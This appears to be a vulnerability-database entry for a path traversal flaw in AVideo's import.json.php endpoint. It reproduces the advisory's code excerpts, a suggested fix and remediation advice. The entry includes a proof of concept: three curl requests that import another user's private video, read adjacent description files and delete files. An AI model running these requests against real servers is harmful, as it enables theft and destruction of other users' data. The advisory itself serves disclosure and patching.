PHP
CVE-2026-33493
HIGH
Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The objects/import.json.php endpoint accepts a user-controlled fileURI POST parameter with only a regex check that the value ends in .mp4. Unlike objects/listFiles.json.php, which was hardened with a realpath() + directory prefix check to restrict paths to the videos/ directory, import.json.php performs no directory restriction. This allows an authenticated user with upload permission to: (1) steal any other user's private video files by importing them into their own account, (2) read .txt/.html/.htm files adjacent to any .mp4 file on the filesystem, and (3) delete .mp4 and adjacent text files if writable by the web server process.
Details
Missing path restriction in import.json.php
At objects/import.json.php:12, the only validation on the user-supplied fileURI is a regex ensuring it ends with .mp4:
// objects/import.json.php:12
if (!preg_match("/.*\\.mp4$/i", $_POST['fileURI'])) {
return false;
}Compare this to the hardened listFiles.json.php:16-28, which was patched to restrict paths:
// objects/listFiles.json.php:16-28
$allowedBase = realpath($global['systemRootPath'] . 'videos');
// ...
$resolvedPath = realpath($_POST['path']);
if ($resolvedPath === false || strpos($resolvedPath . '/', $allowedBase) !== 0) {
http_response_code(403);
echo json_encode(['error' => 'Path not allowed']);
exit;
}The same fix was never applied to import.json.php.
Attack Primitive 1: File content disclosure (.txt/.html/.htm)
At lines 23-43, the endpoint strips the .mp4 extension from fileURI and attempts to read adjacent .txt, .html, or .htm files via file_get_contents():
// objects/import.json.php:23-43
$filename = $obj->fileURI['dirname'] . DIRECTORY_SEPARATOR . $obj->fileURI['filename'];
$extensions = ['txt', 'html', 'htm'];
foreach ($extensions as $value) {
if (file_exists("{$filename}.{$value}")) {
$html = file_get_contents("{$filename}.{$value}");
$_POST['description'] = $html;
// ...
break;
}
}The content flows into $_POST['description'], which is then saved as the video description by upload.php:59-64:
// view/mini-upload-form/upload.php:59-64
if (!empty($_POST['description'])) {
// ...
$video->setDescription($_POST['description']);
}The attacker then views the imported video to read the file contents in the description field. This works for any path where both a .mp4 file and an adjacent .txt/.html/.htm file exist - which is the standard layout for every video in the videos/ directory.
Attack Primitive 2: Private video theft
At line 49, the endpoint copies the .mp4 file to a temp directory and then imports it as the current user's video:
// objects/import.json.php:47-49
$source = $obj->fileURI['dirname'] . DIRECTORY_SEPARATOR . $obj->fileURI['basename'];
if (!copy($source, $tmpFileName)) {
// ...
}An attacker who knows or can enumerate another user's video filename can copy any private .mp4 file into their own account.
Attack Primitive 3: File deletion
At lines 54-65, when $_POST['delete'] is set, the endpoint deletes the source .mp4 and adjacent text files:
// objects/import.json.php:54-61
if (!empty($_POST['delete']) && $_POST['delete'] !== 'false') {
if (is_writable($source)) {
unlink($source);
foreach ($extensions as $value) {
if (file_exists("{$filename}.{$value}")) {
unlink("{$filename}.{$value}");
}
}
}
}PoC
Step 1: Steal a private video
Assuming the attacker knows another user's video filename (e.g., victim_video_abc123), which can be enumerated via the platform UI or API:
curl -b 'PHPSESSID=<authenticated_session_with_upload_perm>' \
-X POST 'https://target/objects/import.json.php' \
-d 'fileURI=/var/www/html/AVideo/videos/victim_video_abc123/victim_video_abc123.mp4'Expected result: The response returns {"error":false, "videos_id": <new_id>, ...}. The victim's private .mp4 is now imported as the attacker's own video at the returned videos_id.
Step 2: Read another user's video description file
curl -b 'PHPSESSID=<authenticated_session_with_upload_perm>' \
-X POST 'https://target/objects/import.json.php' \
-d 'fileURI=/var/www/html/AVideo/videos/victim_video_abc123/victim_video_abc123.mp4&length=100'Expected result: If victim_video_abc123.txt (or .html/.htm) exists alongside the .mp4, its contents are stored as the description of the newly created video. The attacker views the video page to read the exfiltrated content.
Step 3: Delete another user's video
curl -b 'PHPSESSID=<authenticated_session_with_upload_perm>' \
-X POST 'https://target/objects/import.json.php' \
-d 'fileURI=/var/www/html/AVideo/videos/victim_video_abc123/victim_video_abc123.mp4&delete=true'Expected result: The victim's .mp4 file and any adjacent .txt/.html/.htm files are deleted (if writable by the web server process).
Impact
- Private video theft: Any authenticated user with upload permission can import another user's private videos into their own account, bypassing all access controls. This directly compromises video content confidentiality.
- File content disclosure:
.txt,.html, and.htmfiles adjacent to any.mp4on the filesystem can be read by the attacker. Within the AVideovideos/directory, these are video description files that may contain private information. - File deletion: An attacker can delete other users' video files and metadata, causing data loss.
- Blast radius: All private videos on the instance are accessible to any user with upload permission. In default AVideo configurations, registered users can upload.
Recommended Fix
Apply the same realpath() + directory prefix check from listFiles.json.php to import.json.php, immediately after the .mp4 regex check:
// objects/import.json.php - add after line 14 (the preg_match check)
$allowedBase = realpath($global['systemRootPath'] . 'videos');
if ($allowedBase === false) {
die(json_encode(['error' => 'Configuration error']));
}
$allowedBase .= '/';
$resolvedDir = realpath(dirname($_POST['fileURI']));
if ($resolvedDir === false || strpos($resolvedDir . '/', $allowedBase) !== 0) {
http_response_code(403);
die(json_encode(['error' => 'Path not allowed']));
}
// Reconstruct fileURI from resolved path to prevent symlink bypass
$_POST['fileURI'] = $resolvedDir . '/' . basename($_POST['fileURI']);AnalysisAI
The AVideo platform contains a path traversal vulnerability in the objects/import.json.php endpoint that allows authenticated users with upload permissions to bypass directory restrictions and access any MP4 file on the filesystem. Attackers can steal private videos from other users, read adjacent text/HTML files containing video metadata, and delete video files if writable by the web server. A detailed proof-of-concept is publicly available in the GitHub security advisory, and the vulnerability affects all instances where authenticated users have upload permissions, which is the default configuration.
Technical ContextAI
This vulnerability affects the AVideo platform, specifically the objects/import.json.php endpoint (CPE pkg:composer/wwbn_avideo). The root cause is a CWE-22 path traversal flaw where user-supplied fileURI parameters are validated only with a regex check requiring .mp4 extension, without the realpath() and directory prefix validation that was previously applied to the listFiles.json.php endpoint. The PHP application uses file_get_contents() to read adjacent .txt/.html/.htm files and copy() to duplicate MP4 files without verifying the resolved canonical path falls within the intended videos directory. This allows directory traversal using absolute paths or relative path sequences to access files outside the sandboxed videos directory, bypassing application-level access controls entirely.
RemediationAI
Apply the security patch provided in the GitHub security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-83xq-8jxj-4rxm which implements realpath() validation and directory prefix checking in objects/import.json.php matching the existing protection in listFiles.json.php. The recommended fix adds canonical path resolution to ensure the user-supplied fileURI resolves to a path within the allowed videos directory, rejecting any traversal attempts with HTTP 403. As an interim mitigation until patching, restrict upload permissions to only highly trusted administrators, implement strict input validation at the web application firewall layer to block traversal sequences, and monitor for suspicious fileURI parameters containing absolute paths or parent directory references in import.json.php requests. Organizations should also audit access logs for exploitation attempts using absolute paths in the fileURI parameter.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-83xq-8jxj-4rxm